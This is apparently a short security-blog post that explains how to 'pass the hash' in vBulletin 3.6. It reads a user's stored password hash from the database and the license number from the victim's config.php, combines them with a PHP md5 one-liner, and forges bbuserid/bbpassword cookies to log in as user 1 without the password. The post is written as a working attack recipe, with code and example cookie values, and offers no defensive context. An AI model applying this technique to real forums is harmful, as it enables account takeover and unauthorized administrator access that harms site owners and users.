Passing the hash in VBulettin

 

  1. Find md5 hash from VBulettin database
  2. Find Licence Number from VBulettin config.php
  3. Change hash propertly for Cookie ( md5($hashInDB . $VBlicence)
  4. Create Cookie

1. Find md5 hash from VBulettin database

We consider that you already¬† have the md5 hash for password from VBulettin database… (SELECT password FROM user) the format for this md5 hash is -> md5(md5($pass).$salt) [PHP]
ex. 6e84265e3ba153be675164a64dd801b0

2. Find Licence Number from VBulettin config.php

We consider that you have access to victim’s web dir ex. /home/<user>/public_html/
Then you just need to read /home/<user>/public_html/includes/config.php and you will se something like this…

VBulleting conf

/*================================================*\
|| ################################################ ||
|| # vBulletin 3.6.X – Licence Number XXXXXXXXXX
|| # —————————————————————-
|| # All PHP code in this file is ?2000-2007 Jelsoft Enterprises Ltd.
|| # This file may not be redistributed in whole or significant part.
|| # —————- VBULLETIN IS NOT FREE SOFTWARE —————-
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html
|| ################################################ ||
\*================================================*/

so now you have the licence number ex. XXXXXXXXXX

3. Change hash propertly for Cookie ( md5($hashInDB . $VBlicence)

VBulleting uses these technique for cookie’s hash -> md5($hashInDB . $VBlicence) so we will make a php script to change the initial md5 hash to a propertly md5 hash for cookie

<?php
echo md5(“6e84265e3ba153be675164a64dd801b0″ . “XXXXXXXXXX”);
?>

result:
ex. a52a7b7c8940cd35ca20827351f2eb1c

4. Create Cookie

A general example for vbulletin’s cookie…

Cookie: bblastvisit=1185263194; bblastactivity=0; bbuserid=124; bbpassword=4ec842e9ece18137271ff9b8f00d07b8

The cookie that will work for this scenario …

Cookie: bbuserid=1; bbpassword=a52a7b7c8940cd35ca20827351f2eb1c

 

Related

When encryption is unserviceable

Share

Leave a Reply

Photo

root

June 23rd


Papers


line

© 2018 SuRGeoNix | Security Blog